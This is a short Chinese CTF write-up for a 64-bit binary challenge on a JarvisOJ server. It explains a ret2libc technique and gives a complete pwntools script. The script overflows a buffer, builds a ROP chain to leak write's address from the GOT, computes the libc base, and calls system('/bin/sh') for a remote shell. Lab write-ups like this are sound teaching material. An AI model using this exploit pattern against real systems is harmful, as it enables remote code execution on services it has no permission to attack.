与level2_x64类似,也是x64位的一个程序,但是程序之中并没有直接调用system函数,也没有bin/sh参数,只提供了一个libc库,所以是要让我们通过libc库泄露system函数的地址和binsh的地址,这里要注意的是依旧是寄存器的问题,所以我们要构建gadget,rop绕过,通过泄漏出system函数的地址,然后在bss段中写入binsh参数,调用system函数从而getshell
from pwn import *
from time import *
p = remote('pwn2.jarvisoj.com',9883)
write_plt = 0x04004B0
write_got = 0x0600A58
poprdiret = 0x04006b3
start = 0x04004F0
poprsiret = 0x04006b1
write_libc_address = 0x00000000000eb700 #readelf -a ./libc-2.19.so | grep " write@"
bin_sh_libc_address = 0x17c8c3 #strings -a -t x libc-2.19.so | grep "/bin/sh"
system_libc_address = 0x0000000000046590 #readelf -a ./libc-2.19.so | grep " system@"
exit_libc_address = 0x000000000003c1e0 #readelf -a ./libc-2.19.so | grep " exit@"
payload1 = '\x00'*(0x80+8) + p64(poprdiret) + p64(1)+ p64(poprsiret)+p64(write_got) + p64(1) + p64(write_plt) +p64(start)
p.recvuntil("Input:\n")
p.sendline(payload1)
leak = u64(p.recv(8))
libc_base = leak - write_libc_address
system = libc_base + system_libc_address
binsh = libc_base + bin_sh_libc_address
exit = libc_base + exit_libc_address
payload = 'a'*(0x80+8) + p64(poprdiret) + p64(binsh) + p64(system) +p64(exit)
p.sendline(payload)
p.interactive()
网友评论